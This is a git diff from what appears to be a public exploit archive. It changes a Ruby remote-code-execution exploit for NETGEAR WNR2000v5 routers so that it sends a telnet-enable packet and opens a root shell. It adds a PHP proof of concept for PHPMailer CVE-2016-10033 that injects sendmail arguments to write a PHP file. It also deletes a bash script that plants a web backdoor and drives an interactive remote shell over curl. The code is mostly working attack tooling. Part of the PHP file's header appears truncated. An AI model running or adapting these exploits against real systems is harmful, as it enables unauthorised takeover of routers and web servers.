diff --git a/files.csv b/files.csv index 042cf87d5..3a4279e43 100644 --- a/files.csv +++ b/files.csv @@ -36921,4 +36921,4 @@ id,file,description,date,author,platform,type,port 40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0 40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0 40966,platforms/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps,0 -40968,platforms/php/webapps/40968.sh,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0 +40968,platforms/php/webapps/40968.php,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0 diff --git a/platforms/cgi/remote/40949.rb b/platforms/cgi/remote/40949.rb index f61f500cb..8502f8411 100755 --- a/platforms/cgi/remote/40949.rb +++ b/platforms/cgi/remote/40949.rb @@ -1,6 +1,4 @@ # -# Source: https://raw.githubusercontent.com/pedrib/PoC/master/exploits/netgearPwn.rb -# # Remote code execution in NETGEAR WNR2000v5 # - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security # Released on 20/12/2016 @@ -10,14 +8,14 @@ # # # TODO: -# - test default credentials first (with correct and incorrect password, see if auth can be used by default with incorrect password) -# - finish telnetenable (get mac and send packet) -# - finish timestamp regex (?) # - randomise payload require 'net/http' require 'uri' require 'time' +require 'digest' +require 'openssl' +require 'socket' #################### # ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c @@ -114,8 +112,8 @@ end ##################### # Ruby code ported from https://github.com/insanid/netgear-telenetenable # -def telnetenable (mac, username, password) - mac_pad = mac.gsub(':', '').upcase.ljust(0x10,"\x00") +def telnetenable (username, password) + mac_pad = @mac.gsub(':', '').upcase.ljust(0x10,"\x00") username_pad = username.ljust(0x10, "\x00") password_pad = password.ljust(0x21, "\x00") cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00") @@ -130,8 +128,9 @@ def telnetenable (mac, username, password) cipher.key = secret_key cipher.padding = 0 binary_data = (cipher.update(payload) << cipher.final) - - binary_data.unpack('N*').pack('V*') + + s = UDPSocket.new + s.send(binary_data.unpack('N*').pack('V*'), 0, @target.split(':')[0], 23) end ##################### @@ -169,8 +168,8 @@ def get_request(uri_str) uri = URI.parse(uri_str) http = Net::HTTP.new(uri.host, uri.port) #http.set_debug_output($stdout) + request = Net::HTTP::Get.new(uri.request_uri) request.basic_auth(USERNAME, PASSWORD) - request = Net::HTTP::Get.new(uri.request_uri) http.request(request) end @@ -179,8 +178,8 @@ def post_request(uri_str, body) header = { 'Content-Type' => 'application/x-www-form-urlencoded' } http = Net::HTTP.new(uri.host, uri.port) #http.set_debug_output($stdout) + request = Net::HTTP::Post.new(uri.request_uri, header) request.basic_auth(USERNAME, PASSWORD) - request = Net::HTTP::Post.new(uri.request_uri, header) request.body = body http.request(request) end @@ -246,9 +245,9 @@ end def get_auth_timestamp(mode) if mode == "bof" - uri_str = "lang_check.html" + uri_str = "http://#{@target}/lang_check.html" else - uri_str = "PWD_password.htm" + uri_str = "http://#{@target}/PWD_password.htm" end response = get_request(uri_str) if response.code == 401 @@ -268,10 +267,10 @@ def got_shell end if ARGV.length < 2 - puts "Usage: ./netgearPwn.rb [noreboot]" + puts "Usage: ./netgearPwn.rb > [noreboot]" puts "\tcheck: see if the target is vulnerable" puts "\tbof: run buffer overflow exploit on the target" - puts "\ttelnet: run telnet exploit on the target - DO NOT USE FOR NOW, DOESN'T WORK!" + puts "\ttelnet : run telnet exploit on the target, needs MAC address" puts "\tnoreboot: optional parameter - don't force a reboot on the target" exit(1) end @@ -279,12 +278,23 @@ end @target = ARGV[0] mode = ARGV[1] -if ARGV.length == 3 && ARGV[2] == "noreboot" +if (ARGV.length > 2 && ARGV[2] == "noreboot") || (ARGV.length > 3 && ARGV[3] == "noreboot") reboot = false else reboot = true end +if mode == "telnet" + if ARGV.length == 3 + @mac = ARGV[2] + elsif ARGV.length == 4 + @mac = ARGV[3] + else + puts "[-] telnet mode needs MAC address argument!" + exit(-1) + end +end + # Maximum time differential to try # Look 5000 seconds back for the timestamp with reboot # 500000 with no reboot @@ -383,11 +393,11 @@ while true if response.code == "200" # this only occurs in the telnet case credentials = get_password - #telnetenable(mac, credentials[0], credentials[1]) - #sleep 5 - #got_shell - puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}" - puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!" + telnetenable(credentials[0], credentials[1]) + sleep 5 + got_shell + #puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}" + #puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!" exit(0) end rescue EOFError @@ -425,4 +435,4 @@ while true end # If we get here then the exploit failed -puts "[-] Exploit finished. Failed to get a shell!" \ No newline at end of file +puts "[-] Exploit finished. Failed to get a shell!" diff --git a/platforms/php/webapps/40968.php b/platforms/php/webapps/40968.php new file mode 100755 index 000000000..44473975b --- /dev/null +++ b/platforms/php/webapps/40968.php @@ -0,0 +1,79 @@ + +09607 <<< +09607 <<< +09607 <<< +09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- + + +See the full advisory URL for details. + +*/ + + +// Attacker's input coming from untrusted source such as $_GET , $_POST etc. +// For example from a Contact form + +$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com'; +$msg_body = ""; + +// ------------------ + + +// mail() param injection via the vulnerability in PHPMailer + +require_once('class.phpmailer.php'); +$mail = new PHPMailer(); // defaults to using php "mail()" + +$mail->SetFrom($email_from, 'Client Name'); + +$address = "customer_feedback@company-X.com"; +$mail->AddAddress($address, "Some User"); + +$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033"; +$mail->MsgHTML($msg_body); + +if(!$mail->Send()) { + echo "Mailer Error: " . $mail->ErrorInfo; +} else { + echo "Message sent!\n"; +} + + + +?> + + diff --git a/platforms/php/webapps/40968.sh b/platforms/php/webapps/40968.sh deleted file mode 100755 index 116d0bf9c..000000000 --- a/platforms/php/webapps/40968.sh +++ /dev/null @@ -1,27 +0,0 @@ -#!/bin/bash -# CVE-2016-10033 exploit by opsxcq -# https://github.com/opsxcq/exploit-CVE-2016-10033 - -echo '[+] CVE-2016-10033 exploit by opsxcq' - -if [ -z "$1" ] -then - echo '[-] Please inform an host as parameter' - exit -1 -fi - -host=$1 - -echo '[+] Exploiting '$host - -curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php' - -cmd='whoami' -while [ "$cmd" != 'exit' ] -do - echo '[+] Running '$cmd - curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d - echo - read -p 'RemoteShell> ' cmd -done -echo '[+] Exiting' \ No newline at end of file